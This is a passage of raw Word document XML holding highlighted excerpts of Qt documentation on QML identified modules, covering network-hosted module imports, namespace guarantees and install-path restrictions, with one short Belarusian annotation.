          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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Style w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00522BA5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="383" w:name="remotely-installed-identified-modules"/>
      <w:bookmarkStart w:id="384" w:name="_Toc483000613"/>
      <w:bookmarkStart w:id="385" w:name="_Toc483003630"/>
      <w:bookmarkStart w:id="386" w:name="_Toc483603966"/>
      <w:bookmarkStart w:id="387" w:name="_Toc483605186"/>
      <w:bookmarkEnd w:id="383"/>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remotely Installed Identified Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="384"/>
      <w:bookmarkEnd w:id="385"/>
      <w:bookmarkEnd w:id="386"/>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified modules are also </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accessible as a network resource</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In the previous example, </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if the</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\qml\projects</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory was hosted as</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://www.some-server.com/qml/projects</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and this URL was added to the QML import path, the module could be imported in exactly the same way</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="00522BA5" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D52E55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when a file imports a module over a network, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can only access QML and JavaScript resources provided by the module</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; it </w:t>
      </w:r>
      <w:r w:rsidRPr="00D52E55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot access any types defined by C++ plugins</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the module.</w:t>
      </w:r>
      <w:r w:rsidR="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00522BA5" w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>абмежаванні сецевога выкарыстання модуляў</w:t>
      </w:r>
      <w:r w:rsidR="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00522BA5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="semantics-of-identified-modules"/>
      <w:bookmarkStart w:id="389" w:name="_Toc483000614"/>
      <w:bookmarkStart w:id="390" w:name="_Toc483003631"/>
      <w:bookmarkStart w:id="391" w:name="_Toc483603967"/>
      <w:bookmarkStart w:id="392" w:name="_Toc483605187"/>
      <w:bookmarkEnd w:id="388"/>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Semantics of Identified Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
      <w:bookmarkEnd w:id="390"/>
      <w:bookmarkEnd w:id="391"/>
      <w:bookmarkEnd w:id="392"/>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An identified module is provided with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the QML engine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>other modules are unable to modify</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or override types in the module's namespace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>other modules are unable to register new types</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the module's </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">usage of type names by </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clients will resolve deterministically</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a given type definition depending on the versioning specified and the import order</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that clients which use the module can be certain that the object types defined in the module will behave as the module author documented</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">An identified module has several </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>restrictions</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> upon it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an identified module </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be installed</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId315" w:anchor="qml-import-path" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML import path</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the module </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> specified in the</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId316" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>module identifier directive</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must match the install path</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
